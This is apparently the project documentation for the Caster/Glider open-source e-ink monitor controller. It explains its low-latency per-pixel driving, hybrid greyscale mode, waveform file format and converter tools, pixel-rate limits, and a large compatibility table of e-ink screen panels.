- EPD Power Supply: The power supply provides a common, source, and gate supply to the EPD panel. In addition to a basic on/off switch, the MCU can also adjust the VCOM voltage, and measure the optimal VCOM voltage of the panel installed. The VCOM measurement is done by isolating the VCOM supply from the screen while keeping the gate supply, scanning the screen with source = VCOM, and measuring the kick-back voltage on the VCOM.
- FPGA Bitstream Loading: The FPGA doesn’t have its own flash memory, the bitstream is pushed over SPI from the MCU to the FPGA upon powering up. In this way, the FPGA bitstream can be easily bundled together with the MCU’s firmware and updated together.
- Type-C Negotiation: The onboard USB Type-C port can support video input in addition to powering the board using the USB-C DisplayPort Alt Mode. The MCU runs a USB-C PD stack to communicate this capability to the video source device over standard USB PD protocol. The MCU also controls the Type-C signal mux to remap the lanes to the correct place depending on the cable orientation.
- Video decoder initialization: The FPGA used on the board doesn’t have high-speed deserializers to interface with common high-speed video interfaces such as DisplayPort or DVI directly. Instead, dedicated video decoder chips are used on the board. They typically need initialization before use, and the MCU takes care of this. In this specific design, the DP decoder chip also handles AUX P/N line flipping based on the Type-C cable orientation.
- PC communication: One advantage of the Caster is that update modes and forced update/ clearing can be applied on a per-pixel basis. Software may utilize this to assign different modes to different windows or change update modes depending on the content on the fly. This is done by sending requests to the MCU over a USB connection. The MCU runs TinyUSB and presents itself as an HID device so it can forward messages between the host PC and the FPGA.
### Low Latency Drive
The Caster implements several techniques for reducing the latency, which will be explained here.
As described before, the existing basic driving method employs a global counter for looking up the waveform table. This imposes a limit on the global image update rate: the controller only accepts a new incoming image after the previous update is finished. The update usually takes about 100ms, translating to an image rate of 10Hz. Or, in other words, the user needs to potentially wait up to 100ms before the new image is even processed by the controller.
One way to mitigate this issue is by having multiple update regions. For example, imagine the user typing "a" and then "b". In a single-region controller design, "a" is drawn to the screen immediately, while "b" needs to wait 100ms before it gets drawn. If the controller supports multiple regions, it could start drawing the letter "b" as soon as it's typed, reducing the latency. This however requires the software to program the controller to correctly set regions to letter boundaries, and to re-allocate regions on the fly, as the number of regions is generally quite limited (like 4-16).
![caster-pipelined](assets/caster_pipelined_update.svg)
The Caster simply treats every pixel as an individual update region, which provides maximum flexibility and is transparent to the software.
Another latency optimization technique the Caster implements deals with pixels that are already being updated. For example, imagine the user types the letter "a" and deletes it right after. With the basic driving method, the controller needs to wait until the letter is fully displayed before it can erase it. The regional update described above doesn't help here because the same pixels are involved, so they have to be in the same region. The second technique is early cancellation: if a pixel changes before it's fully driven, instead of waiting for the drive to finish, the pixel is immediately driven toward the newly requested state, and the frame counter is updated based on the newly calculated driving time.
![caster-early-cancel](assets/caster_early_cancel.svg)
By combining both, it’s then possible to implement low-latency binary and 4-level grayscale modes. The tradeoff between framerate and contrast ratio is also no longer relevant. Both a high frame rate and high contrast ratio are achieved automatically.
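Purely as a conceptual illustration (this is not the Caster RTL, and the state layout is hypothetical), per-pixel tracking with early cancellation can be sketched like this:

```c
#include <stdint.h>

// Hypothetical per-pixel state, for illustration only
typedef struct {
    uint8_t target;       // requested value (0 = black, 1 = white)
    uint8_t current;      // value currently settled on the screen
    uint8_t frames_left;  // remaining frames of driving for this pixel
} pixel_state_t;

#define DRIVE_FRAMES 10

// Called once per pixel per frame; returns the 2-bit voltage code to output
uint8_t process_pixel(pixel_state_t *s, uint8_t new_input) {
    if (new_input != s->target) {
        // Input changed: retarget immediately instead of waiting for the
        // previous drive to finish (early cancellation). Simplified: the real
        // remaining time depends on how far the pixel had already been driven.
        s->target = new_input;
        s->frames_left = DRIVE_FRAMES;
    }
    if (s->frames_left == 0) return 0;            // fully driven: no voltage
    s->frames_left--;
    if (s->frames_left == 0) s->current = s->target;
    return s->target ? 2 /* VPOS, to white */ : 1 /* VNEG, to black */;
}
```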
### Hybrid Greyscale Mode
As discussed previously, getting a [greyscale](#greyscale-display) image on Eink is a sophisticated process: it's much slower than binary and shows flashing images along the way. This poses challenges on how to make it useful for users.
On eReaders, the software could switch between fast and slow modes based on the action. The eReader software may also simply not support things that don’t work well on the screen. For example, there might be no scrolling but only whole page flipping. What’s being done on existing eink monitors is throwing the problem back to the user. The user simply needs to accept that the update is slow, the latency is long, and the process is flashing.
What Caster implements is automatic switching between the fast binary mode and the slow greyscale mode on a per-pixel basis. When the input image changes, it switches to binary mode and does the update. When the image hasn't changed for a while, it re-renders the image in greyscale.
### Limitations
The method does come with downsides: it requires much more memory bandwidth to implement. Taking a 1080P panel as an example (roughly 120 Mp/s (million pixels per second) with reduced blanking). With the traditional method, the controller only needs the old pixel state and the new pixel state (4bpp each) to determine the voltage needed or 8-bit/ 1-byte memory read per pixel. The bandwidth requirement is then 120Mp/s x 1B/pixel = 120MB/s. One single 16-bit SDR-133 SDRAM is more than enough to handle this. The Caster currently stores a 16-bit state per pixel (for 2 sets of old pixel values and pixel-specific timer counters), and the pixel state needs to be updated per frame, so the pixel state buffer alone requires 2-byte read and 2-byte write per pixel. It then takes another 0.5-byte per pixel to read the new image value from memory. 120Mp/s x 4.5B/pixel = 540MB/s. A 16-bit DDR-333 memory is then needed to implement this. The Glider hardware uses a DDR3-800 memory to allow even higher resolution. If the controller is not integrated inside an SoC (like our case, the controller is sitting inside the monitor, not part of your PC’s CPU/GPU), it also needs to use actual low latency video interfaces like DVI or DP, instead of simpler but slower interfaces like USB or I80/SPI. This could drive up costs as well. These techniques also don't help with use cases like reading books, so commercial e-reader solutions have little reason to spend the extra trouble to implement these.
### Hardware Design Decisions
To be written (TODO)
### Resources Utilization
The following numbers are for reference only and would vary depending on RTL options and specific targets.
- 1704 FF
- 2531 LUT6
- 60 KB BRAM
## Building
### PCB
The PCB is designed with KiCAD 8.0. To get optimal results, use a 4-layer stack up with 1080 PP layers, but 2313 or 3313 are also acceptable.
There are 2 versions of the mainboard, one full version, and a lite version. For now, only the full version is being actively worked on. The lite version removes dedicated external decoders for DVI/ DP and removes the bulk of the TypeC circuitry to lower the cost. The only video interface is a DVI port feeding directly into the FPGA.
### FPGA Bitstream
To be written (TODO)
### MCU Firmware
To be written (TODO)
### Working with Waveforms
The following section describes the waveform file format and how to use it.
#### Obtaining Waveform
In general, the screen vendor (Eink, Good Display, etc.) should provide the waveform file.
If your screen has a flash chip on it, it's also possible to extract the waveform from a flash dump:
```dd if=somedump.bin of=waveform.wbf bs=1 skip=2182```
If you have access to an application board, it might also be possible to extract the waveform there. For example, if the system uses a T1000 controller, the waveform is usually stored in the SPI flash connected to the T1000.
#### Waveform Formats
E-Ink distributes waveforms in the wbf file format. SoC/ Eink controller hardware often requires converting the file into a vendor-specific file format. Caster/ Glider also uses a specific binary format. This project defines a common human-readable format (Interchangeable Waveform Format, IWF) and provides several tools for working with different binary formats and the IWF format.
#### Interchangeable Waveform Format
The waveform consists of one descriptor file with the iwf extension (INI format) and a number of LUT data files in CSV format.
The descriptor contains the following required fields:
- VERSION: the version of the descriptor (should be 2.0)
- NAME: (optional) original name for the waveform
- BPP: (optional, default 4) 4 or 5, representing the internal state count used for waveform
- PREFIX: the filename prefix for actual waveform files
- MODES: the total number of modes supported by the waveform
- TEMPS: the total number of temperature ranges supported by the waveform
- TxRANGE: the supported temperature in degC, where x is the temperature ID
- TUPBOUND: (optional) upper bound for temperature range, each range is TxRANGE to Tx+1RANGE (or TUPBOUND in case of the last one)
- TABLES: total number of LUTs inside the waveform
- TBxFC: the frame count for the table, where x is the LUT ID
Each mode has its own mode section named [MODEx], where x is the mode ID, containing the following fields:
- NAME: the name for that mode
- T*TABLE: the table used for the temperature in that mode
There should be a number of LUTs, saved with filenames like PREFIX_TBx.csv, where x is the LUT ID. Each csv file should contain a LUT of the form lut[src][dst][frame]: to transition from the src greyscale level to the dst greyscale level, it gives the voltage to apply to the screen at each frame of the frame sequence (0/3: GND / keep, 1: VNEG / drive to black, 2: VPOS / drive to white). Each line contains the frame sequence for one or more source-to-destination pairs.
For example:
- ```4,7,1,1,1,0,2``` means: to transition from greyscale level 4 to greyscale level 7, there are 5 frames, applying VNEG, VNEG, VNEG, GND, VPOS in order
- ```0:14,15,2,2,2``` means: to transition from any greyscale level between 0 and 14 to greyscale level 15, there are 3 frames, each applying VPOS
These examples are provided only to illustrate the file format; they are not valid or meaningful Eink driving sequences.
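As a sanity check of the format description, here is a small, unofficial Python sketch (not one of this repo's converter tools) that parses such lines into the lut[src][dst][frame] structure:

```python
# Minimal sketch of parsing one IWF LUT csv line, following the format described above.

def parse_lut_line(line: str, lut: dict) -> None:
    fields = line.strip().split(",")
    src_field, dst, frames = fields[0], int(fields[1]), [int(v) for v in fields[2:]]
    # The source may be a single level ("4") or a range ("0:14").
    if ":" in src_field:
        lo, hi = (int(v) for v in src_field.split(":"))
        sources = range(lo, hi + 1)
    else:
        sources = [int(src_field)]
    for src in sources:
        lut.setdefault(src, {})[dst] = frames  # 0/3 = GND, 1 = VNEG, 2 = VPOS


lut = {}
parse_lut_line("4,7,1,1,1,0,2", lut)
parse_lut_line("0:14,15,2,2,2", lut)
print(lut[4][7])   # [1, 1, 1, 0, 2]
print(lut[0][15])  # [2, 2, 2]
```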
#### Converting
The following converters are provided in the repo:
- To convert from iwf to fw (iMX6/7 EPDC format): ```./mxc_wvfm_asm v1/v2 input.iwf output.fw```
- To convert from fw to iwf: ```./mxc_wvfm_dump v1/v2 input.fw output_prefix```
- To convert from wbf to iwf: ```./wbf_wvfm_dump input.wbf output_prefix```
### Compatible Screens
This project only focuses on driving off-the-shelf active matrix electrophoretic displays without integrated controllers. See [Screen Panels](#screen-panels) for the differences between the types of screen panels available. That said, this project is compatible with the majority of these panels, covering sizes from 4.3" up to 13.3", and potentially panels as large as 42" as well (an additional power supply is required in that case).
#### Screen Adapters
Different screen panels have different connectors, and it would take a huge amount of board space to put every possible screen connector on the motherboard. Instead, a series of screen adapters is provided to adapt to screens with different pinouts.
The mainboard natively supports certain 40-pin screens, such as:
- 10.3" 1872x1404: ED103TC1, ES103TC2
- 10.1" 2232x1680: GDEW101M01, GDEW101C01
To see which adapter might work for your screen, check out the [Appendix 1 - Screen List](#screen-list)
#### Pixel Rate Considerations
The input protocol and the processing rate limit which screen models can be supported.
Limit from processing rate (logic and routing delay):
* Processing rate when dithering enabled: 133 MP/s
* Processing rate when dithering disabled: 280 MP/s
* Estimated processing rate with 8-wide design: 500 MP/s
Limit from video interface:
* Maximum pixel rate using DVI (with ADV7611): 165 MP/s
* Maximum pixel rate using DVI (direct deserializer): 105 MP/s
* Maximum pixel rate using DisplayPort (with PTN3460): 224 MP/s
* Maximum pixel rate using DisplayPort (with 7-series 6G SerDes): 720 MP/s
* Maximum pixel rate using MIPI (with 1.05Gbps LVDS): 230 MP/s
Limit from memory interface (assuming 90% BW utilization):
* SDR-166 x16: 60 MP/s
* SDR-166 x32: 120 MP/s
* DDR-400 x16: 180 MP/s
* DDR2/3-667 x16: 300 MP/s
* DDR2/3-800 x16: 360 MP/s
* DDR2/3-1066 x16: 480 MP/s
* DDR2/3-800 x32: 720 MP/s
Common screen resolution peak pixel rate (with CVT-RBv2):
* 1024x758 (6.0") @ 85Hz: 74 MP/s
* 1448x1072 (6.0") @ 60Hz: 101 MP/s
* 1448x1072 (6.0") @ 85Hz: 145 MP/s
* 1600x1200 (13.3") @ 60Hz: 125 MP/s
* 1600x1200 (13.3") @ 85Hz: 178 MP/s
* 1872x1404 (10.3") @ 60Hz: 169 MP/s
* 1872x1404 (10.3") @ 85Hz: 243 MP/s
* 1920x1440 (8.0") @ 60Hz: 177 MP/s
* 1920x1440 (8.0") @ 85Hz: 255 MP/s
* 2200x1650 (13.3") @ 60Hz: 232 MP/s
* 2200x1650 (13.3") @ 85Hz: 333 MP/s
* 2560x1600 (12.0") @ 60Hz: 261 MP/s
* 2560x1600 (12.0") @ 85Hz: 374 MP/s
* 2560x1920 (13.3") @ 60Hz: 313 MP/s
* 2560x1920 (13.3") @ 85Hz: 449 MP/s
* 3200x1800 (25.3") @ 60Hz: 364 MP/s
* 3200x1800 (25.3") @ 85Hz: 522 MP/s
(Calculate yourself: [Video Timings Calculator by Tom Verbeure](https://tomverbeure.github.io/video_timings_calculator))
Rendering greyscale requires the screen to be refreshed at 85Hz (85Hz is the refresh rate supported by Eink; 60Hz can be made to work with some effort in some cases). Running an input refresh rate lower than the internal refresh rate incurs additional processing latency on both the source (PC) and the monitor due to buffering.
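To combine the three limit categories above: the pixel rate a given build can actually sustain is the minimum of its processing, video-interface, and memory limits, which is then compared against the screen's peak rate. A small illustration using numbers from the lists above (the build configuration here is hypothetical; substitute the entries matching your own setup):

```python
# Hypothetical build: dithering enabled, DVI input via ADV7611, DDR2/3-800 x16 memory.
limits_mps = {
    "processing (dithering enabled)": 133,
    "DVI (ADV7611)": 165,
    "DDR2/3-800 x16": 360,
}
usable = min(limits_mps.values())  # the most restrictive limit wins

peak_1448x1072_60hz = 101  # MP/s, from the list above
print(f"usable: {usable} MP/s ->", "OK" if peak_1448x1072_60hz <= usable else "too fast")
```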
### Case
A reference case design is provided. The case is 3D printable and designed with FreeCAD. Note the design is currently outdated.
## References
Here is a list of helpful references related to driving EPDs:
* Reverse engineering and explanation on driving EPDs: http://essentialscrap.com/eink/index.html
* An early Eink DIY project with many useful info: http://spritesmods.com/?art=einkdisplay&page=1
* STM32 Software bit-banging EPD driver with grayscale: https://hackaday.io/project/11537-nekocal-an-e-ink-calendar
* ESP32 board designed for driving parallel EPDs: https://github.com/vroland/epdiy
* An early tool for reading Eink's wbf file format: https://github.com/fread-ink/inkwave
* A more up-to-date Eink's wbf format parser: https://patchwork.kernel.org/project/linux-arm-kernel/patch/20220413221916.50995-2-samuel@sholland.org/
On the topic of color screen resolution, color mapping, and subpixel rendering:
* Klompenhouwer, Michiel A., and Erno H. A. Langendijk. “59.4: Comparing the Effective Resolution of Various RGB Subpixel Layouts.” SID International Symposium Digest of Technical Papers, vol. 39, no. 1, 2008, pp. 907–10, https://doi.org/10.1889/1.3069822.
* Lai, Chih-chang, and Ching-chih Tsai. “A Modified Stripe-RGBW TFT-LCD with Image-Processing Engine for Mobile Phone Displays.” IEEE Transactions on Consumer Electronics, vol. 53, no. 4, 2007, pp. 1628–33, https://doi.org/10.1109/TCE.2007.4429262.
## License
This document, other than references explicitly given with their corresponding license, is released into the public domain.
The hardware design is released under the CERN Open Source Hardware License strongly-reciprocal variant, CERN-OHL-S. A copy of the license is provided in the source repository. Additionally, a user guide of the license is provided on ohwr.org.
The firmware code is licensed under the MIT license with the following exceptions:
The USB PD library is derived from the Chromium OS project and Reclaimer Labs. The library is licensed under the BSD license.
## Appendix
### Using Screens without Datasheet
To be written
### Screen List
This is a list of Eink screens, their key parameters, and their compatibility with Caster/ Glider. The information is gathered from public sources, so it might be incorrect. This is not a complete list of all screens Eink has ever produced or has in production. This table is intended for hobbyists buying used screens; if you are designing a product with an Eink screen, please contact Eink directly.
With a few exceptions, only screens without an integrated TCON are listed here (in other words, SPI screens are generally not included). These screens are the main focus of this project anyway.
Screen size is the first 3 numbers in the model number, so it's not listed separately in the table. For example, ED060SC4 is 6.0", ED097OC1 is 9.7", and ES133UT1 is 13.3".
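For example, a trivial helper applying that rule (illustrative only):

```python
# The first three digits of the model number give the diagonal in tenths of an inch.
import re

def screen_size_inches(model: str) -> float:
    return int(re.search(r"\d{3}", model).group()) / 10

print(screen_size_inches("ED060SC4"))  # 6.0
print(screen_size_inches("ED097OC1"))  # 9.7
print(screen_size_inches("ES133UT1"))  # 13.3
```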
The adapter column refers to the adapter needed for this particular screen; however, there is no guarantee that it will work, even if it's listed as tested.
| Model Name | Model Number | FPL Platform | Resolution | Marketing Name | Reflectance (Typ) | Contrast Ratio (Typ) | Year | Interface | Pin Count | Adapter | Tested? |
| ---------- | ------------ | ------------ | ----------- | --------------------------- | ----- | ------ | ----- | --------- | --------- | ------- | ------- |
| ED038TH1 | | V320 | 600x600 | Carta | 45% | 17:1 | 2015 | TTL | 34 | 34P-A | |
| ET040TC1 | | | 720x480 | Pearl | | | | TTL | | | |
| ET040TC2 | | | 720x480 | Pearl | | | | TTL | | | |
| ED043WC1 | | V220 | 800x480 | Pearl | 35% | 12:1 | 2013 | TTL | 39 | 39P-C | |
| ED043WC3 | VA3200-DCA | V220 | 800x480 | Pearl | | | 2014 | TTL | 39 | 39P-C | |
| ED043WC5 | VD1405-CGA | 400 | 800x480 | Carta 1200 | | | | SPI | | | |
| ED047TC1 | | V220 | 960x540 | Pearl | 35% | 12:1 | 2015 | TTL | 44 | | |
| ED047TC2 | | V220 | 960x540 | Pearl | 35% | 12:1 | 2016 | TTL | 44 | | |
| ET047TC1 | | 320 | 960x540 | Carta 1.2 | | | | TTL | | | |
| ET047TC2 | | 320 | 960x540 | Carta 1.2 | | | | TTL | | | |
| ED050SC3 | | V110 | 800x600 | Vizplex | 35% | \>6:1 | 2008 | TTL | 33 | 33P-A | |
| ED050SU3 | | V220 | 800x600 | Pearl | | | | TTL | 39 | | |
| ED052TC2 | | 320 | 960x540 | Carta | 45% | 16:1 | 2016 | TTL | 40 | | |
| ED052TC4 | VB3300-EBA | 320 | 1280x720 | Carta 1.2 | 45% | 16:1 | 2017 | TTL | 50 | | |
| EC058TC1 | SA1452-EHA | 320 | 1440x720 | Kaleido / Carta | 24% | 15:1 | 2020 | TTL | 50 | | |
| ED058TC7 | | 320 | | Carta | | | | TTL | | | |
| ED058TC8 | VB3300-EHB | 320 | 1440x720 | Carta | | | | TTL | | | |
| ED060SC1 | | 2.1 | 800x600 | | | | | TTL | 39 | 39P-B | |
| ED060SC3 | | V100 | 800x600 | Vizplex | | | | TTL | 39 | 39P-B | |
| ED060SC4 | | V110 | 800x600 | Vizplex | 35% | \>6:1 | 2008 | TTL | 39 | 39P-B | |
| ED060SC7 | | V220E | 800x600 | Pearl | 40% | 12:1 | 2010 | TTL | 34 | 34P-B | |
| ED060SCA | | V110 | 800x600 | Vizplex | | | | TTL | | | |
| ED060SCE | | V220/V220E | 800x600 | Pearl | | | | TTL | 34 | 34P-B | |
| ED060SCF | | V220 | 800x600 | Pearl | | | | TTL | 34 | 34P-A | |
| ED060SCG | | V220E | 800x600 | Pearl | | | | TTL | 34 | 34P-B | |
| ED060SCN | | V220E | 800x600 | Pearl | | | | TTL | 34 | 34P-A | |
| ED060SCS | | | 800x600 | | | | | TTL | 34 | 34P-B | |
| ED060SCP | | V220 | 800x600 | Pearl | | | | TTL | 34 | 34P-A | |
| ED060SCQ | | V220 | 800x600 | Pearl | | | | TTL | | | |
| ED060SCS | | | 800x600 | | | | | TTL | | | |
| ED060SCT | | 320 | 800x600 | Carta | | | | TTL | 34 | 34P-B | |
| ED060SD1 | | 320 | 800x600 | Carta | | | | TTL | | | |
| ED060XC3 | | V220 | 1024x758 | Pearl | | | | TTL | 34 | 34P-A | Yes |
| ED060XC5 | | V220 | 1024x758 | Pearl | 35% | 12:1 | 2011 | TTL | 34 | 34P-A | |
| ED060XC8 | | V320 | 1024x758 | Carta | | | | TTL | 35 | 35P-A | Yes |
| ED060XC9 | | | 1024x758 | | | | | TTL | 34 | 34P-A | |
| ED060XCD | | 320 | 1024x758 | Carta | | | | TTL | | | |
| ED060XCG | VD1405-FOA | 320/400 | 1024x758 | Carta 1000 / 1200 | 40% | 17:1 | 2020 | TTL | | | |
| ED060XCH | VD1405-FOE | 400 | 1024x758 | Carta 1200 | | | | TTL | | | |
| ED060XD4 | | 320 | 1024x758 | Carta | | | | TTL | 34 | 34P-A | Yes |
| ED060XD6 | | | 1024x758 | | | | | TTL | 34 | 34P-A | |
| ED060XG1 | | V110/V220 | 1024x758 | Vizplex / Pearl | 40% | 12:1 | 2012 | TTL | | | |
| ED060XG2 | | V220 | 1024x758 | Pearl | | | | TTL | | | |
| ED060XG3 | | 320 | 1024x758 | Carta | | | | TTL | | | |
| ED060XH2 | | | 1024x758 | | | | | TTL | 34 | 34P-A | |
| ED060XH7 | | 320 | 1024x758 | Carta 1.2 | 45% | 17:1 | 2015 | TTL | | | |
| ED060XH9 | VB3300-FOG | 320 | 1024x758 | Carta | | | | TTL | | | |
| ED060TC1 | | 320 | 1448x1072 | Carta | | | | TTL | 35 | 35P-A | |
| ED060KC1 | | 320 | 1448x1072 | Carta | 46% | 17:1 | 2014 | TTL | 34 | 34P-A | |
| ED060KC4 | | 320 | 1448x1072 | Carta | | | | TTL | | | |
| ED060KD1 | | 320 | 1448x1072 | Carta | | | | TTL | 34 | 34P-A | Yes |
| ED060KG1 | | 320 | 1448x1072 | Carta | 47% | 17:1 | 2015 | TTL | 34 | 34P-A | |
| ED060KH4 | | 320 | 1448x1072 | Carta | | | | TTL | | | |
| ED060KH6 | VB3300-FOE | 320 | 1448x1072 | Carta | | | | TTL | | | |
| ED060KHC | | | 1448x1072 | | | | | TTL | | | |
| ED060KHE | VD1405-FOH | | 1448x1072 | Carta 1300 | | | | TTL | 34 | 34P-A | |
| EC060KH3 | SA1452-FOA | | 1448x1072 | Kaleido | | | | TTL | | | |
| EC060KH5 | SC1452-FOD | | 1448x1072 | Kaleido 3 | | | | TTL | 34 | 34P-A | |
| ED061KC1 | VD1405-FAA | 400 | 1648x824 | Carta 1200 | | | | TTL | | | |
| ED067KC1 | VB3300-FGA | 320 | 1800x900 | Carta | 45% | 16:1 | 2020 | TTL | 50 | 50P-B | |
| EC067KC1 | SA1452-FGA | | 1800x900 | Kaleido | | | | TTL | 50 | 50P-B | |
| ED068TG1 | | 320 | 1440x1080 | Carta | | | <2013 | TTL | | | |
| ED068TH1 | | 320 | 1440x1080 | Carta | | | <2014 | TTL | | | |
| ED068TH3 | VB3300-FHA | 320 | 1440x1080 | Carta | | | | TTL | | | |
| ED068KC1 | | 400SU | 1648x1236 | Carta 1200 | | | | TTL | 40 | | |
| ED068KC3 | VD1405-FHD | 400 | 1648x1236 | Carta 1200 | | | | TTL | 40 | | |
| ED068KC5 | VD1405-FHF | 400 | 1648x1236 | Carta 1200 | \>44% | \>19:1 | | TTL | 40 | | |
| ED070KC2 | | 320 | 1680x1264 | Carta 1100 | \>47% | \>16:1 | | TTL | | | |
| ED070KC3 | | 320 | 1680x1264 | Carta 1100 | | | | TTL | | | |
| ED070KC4 | VD1400-GOC | 400 | 1680x1264 | Carta 1200 | | | | TTL | | | |
| ED070KH1 | | 320 | 1680x1264 | Carta 1100 | | | | TTL | | | |
| EC070KH1 | SC1452-GOA | | 1680x1264 | Kaleido Plus | | | | TTL | | | |
| LB071WS1 | | | 1024x600 | | | 7:1 | | TTL | | | |
| ET073TC1 | | V320 | 750x200 | Carta | | | 2016 | TTL | | | |
| ED078KC1 | | | 1872x1404 | Carta 1.2 | 45% | 16:1 | 2016 | TTL | 40 | 40P-A | |
| ED078KC2 | VB3300-GHC | 320 | 1872x1404 | Carta | | | | TTL | 40 | 40P-A | |
| ED078KH1 | | 320 | 1872x1404 | Carta | | | | TTL | 40 | 40P-A | |
| ED078KH3 | | 320 | 1872x1404 | Carta 1.2 | | | | TTL | 40 | 40P-A | |
| ED078KH4 | VB3300-GHB | 320 | 1872x1404 | Carta | | | | TTL | 40 | 40P-A | |
| EC078KH3 | SC1452-GHA | | 1872x1404 | Kaleido Plus | | | | TTL | 40 | 40P-A | |
| EC078KH4 | SC1452-GHB | | 1872x1404 | Kaleido Plus ? | | | | TTL | 40 | 40P-A | |
| EC078KH5 | SC1452-GHC | | 1872x1404 | Kaleido Plus ? | | | | TTL | 40 | 40P-A | |
| EC078KH6 | SC1452-GHD | | 1872x1404 | Kaleido 3 | | | | TTL | 40 | 40P-A | |
| EC078KH7 | SC1452-GHE | | 1872x1404 | Kaleido 3 | | | | TTL | 40 | 40P-A | |
| ED080XC1 | | V110 | 1024x768 | Vizplex | | | | TTL | | | |
| ED080TC1 | | V220 | 1600x1200 | Pearl | | | | TTL | | | |
| EC080SC2 | | V250 | 600xRGBx800 | Triton 2 | | | | TTL | 40 | 40P-A | Yes |
| ES080KC2 | VD1400-HOB | 400 | 1920x1440 | Carta 1200 | | | | TTL | | | |
| ES080KH1 | | | | | | | | | | | |
| AC080KH1 | AD1004-HOA | HAL3 | 1920x1440 | Gallery 3 | | | | MiniLVDS | | | |
| ED097OC1 | | V110A | 1200x825 | Vizplex | 35% | 7:1 | 2008 | TTL | 33 | 33P-A | |
| ED097OC4 | | V110A/V220 | 1200x825 | Vizplex / Pearl | | | | TTL | 33 | 33P-A | |
| ED097OD2 | | V220 | 1200x825 | Pearl | | | | TTL | 33 | 33P-A | |
| ED097TC1 | | V220 | 1200x825 | Pearl | | | | TTL | 33 | 33P-A | |
| ED097TC2 | VB3300-JGA | 320 | 1200x825 | Carta 1.2 | 42% | 16:1 | 2016 | TTL | 33 | 33P-A | |
| EL097TR2 | EA2220-JGB | | 1200x825 | Spectra 3000 | | | | TTL | | | |
| ED100UC1 | VB3300-KOA | 320 | 1600x1200 | Carta | 45% | 16:1 | 2020 | TTL | 40 | DIRECT | |
| ES103TC1 | VB3300-KCA | 320 | 1872x1404 | Carta 1.2 | 40% | 12:1 | 2016 | TTL | 40 | DIRECT | |
| ED103TC2 | VB3300-KCD | 320 | 1872x1404 | Carta | 43% | 14:1 | 2019 | TTL | 40 | DIRECT | |
| ES103TD1 | | 320 | 1872x1404 | Carta | | | | TTL | | | |
| ES103TD3 | | 320 | 1872x1404 | Carta | | | | TTL | | | |
| EC103TD1 | SA1452-KCC | | 1872x1404 | Kaleido | | | | TTL | | | |
| EC103TH2 | SC1452-KCB | | 1872x1404 | Kaleido Plus | | | | TTL | | | |
| EC103KH2 | SC1452-KCD | | 2480x1860 | Kaleido 3 | | | | TTL | | | |
| ES107KC1 | VD1400-KGA | 400 | 2560x1920 | Carta 1200 | | | | TTL | | | |
| ES108FC1 | | 320 | 1920x1080 | Carta | 46% | 16:1 | 2017 | TTL | 50 | 50P-C | |
| ES108FC2 | | 320 | 1920x1080 | Carta | | | | TTL | | | |
| ED113TC1 | VB3300-LCA | 320 | 2400x1034 | Carta | 35% | 12:1 | 2017 | TTL | 50 | 50P-A | |
| ED113TC2 | VB3300-LCB | 320 | 2400x1034 | Carta 1.2 | 35% | 12:1 | 2019 | TTL | 50 | 50P-A | |
| EC113TC1 | SC1452-LCA | | 2400x1034 | Kaleido Plus ? | | | | TTL | 50 | 50P-A | |
| ED115OC1 | | V220 | 2760x2070 | Pearl | 35% | 12:1 | 2012 | TTL | 40 | DIRECT | |
| AC118TC1 | AD1004-LHA | | | Gallery 3 | | | | MiniLVDS | | | |
| ES120MC1 | VD1400-MOA | 400 | 2560x1600 | Carta 1200 | | | | TTL | 40 | | |
| ES133UT1 | | V220 | 1600x1200 | Pearl | 35% | 12:1 | 2013 | TTL | 39 | 39P-A | Yes |
| ES133UT2 | | 320 | 1600x1200 | Carta | | | | TTL | 39 | 39P-A | Yes |
| ES133UE2 | | 320 | 1600x1200 | Carta | | | | TTL | 39 | 39P-A | |
| ED133UT2 | VB3300-NCB | 320 | 1600x1200 | Carta 1.2 | 45% | 16:1 | 2016 | TTL | 39 | 39P-A | |
| ED133UT3 | VB3300-NCC | 320 | 1600x1200 | Carta | 45% | 16:1 | 2019 | TTL | 39 | 39P-A | |
| ES133TT3 | | 320 | 2200x1650 | Carta 1.2 | 40% | 12:1 | 2016 | TTL | 39 | | |
| ES133TT5 | VH1948-NCC | 450 | 2200x1650 | Carta 1250 | | | | TTL | 39 | | |
| EC133UJ1 | SD1452-NCB | | 1600x1200 | Kaleido 3 Outdoor | | | | TTL | 39 | 39P-A | |
| AC133UT1 | AA1020-NCA | | 1600x1200 | Gallery / Gallery 4000 | 35% | 10:1 | 2020 | TTL | 39 | 39P-A | |
| EL133US1 | | | 1600x1200 | Spectra 3000 | | | | TTL | 39 | 39P-A | Yes |
| EL133UR1 | EA2220-NCC | | 1600x1200 | Spectra 3000 | 33% | 15:1 | 2020 | TTL | 39 | 39P-A | |
| EL133UF1 | ED2208-NCA | | 1600x1200 | Spectra 6 | | | | QSPI | | | |
| ED140TT1 | VB3300-IDA | 320 | 1440x300 | Carta | | | | TTL | | | |
| AC253TT1 | AA1020-PEA | | 3200x1800 | Gallery Plus / Gallery 4000 | 35% | 10:1 | 2020 | MiniLVDS | 51x2 | | |
| EL253EW1 | ED2208-PEA | | 3200x1800 | Spectra 6 | | | | MiniLVDS | | | |
| EC253TT1 | SD1452-PEA | | 3200x1800 | Kaleido 3 Outdoor | | | | MiniLVDS | | | |
| ED253TT1 | VB3300-PEA | 320 | 3200x1800 | Carta 1.2 | | | | MiniLVDS | 51x2 | | |
| ED253TT2 | VB3300-PEB | 320 | 3200x1800 | Carta 1.2 | | | | MiniLVDS | 51x2 | | |
| ED253TT3 | VB3300-PEC | 320 | 3200x1800 | Carta 1.2 | | | | MiniLVDS | 51x2 | | |
| EL253TV1 | EB2200-PEA | | 3200x1800 | Spectra 3100 | | | | MiniLVDS | 51x2 | | |
| ED280TT1 | VB3300-PHA | 320 | 3840x1080 | Carta 1.2 | 40% | 12:1 | 2020 | MiniLVDS | 51x2 | | |
| ED312TT2 | VA3200-QAA | V220 | 2560x1440 | Pearl | | | | TTL | 50x4 | | |
| ED312TT3 | VA3200-QAB | V220 | 2560x1440 | Pearl | 40% | 12:1 | 2018 | TTL | 50x4 | | |
| EC312TT2 | SB1452-QAA | V220 | 2560x1440 | Triton | | | | TTL | 50x4 | | |
| EL315TW1 | ED2208-QBA | | 2560x1440 | Spectra 6 | | | | QSPI | | | |
| ED420TT1 | | V220 | 2880x2160 | Pearl | | | | TTL | 50x2 | | |
| ED420TT3 | VB3300-RBA | 320 | 2880x2160 | Carta 1.2 | 45% | 16:1 | 2020 | TTL | 50x2 | | |
| ED420TT5 | VB3300-RBB | 320 | 2880x2160 | Carta 1.2 | | | | TTL | 50x2 | | |
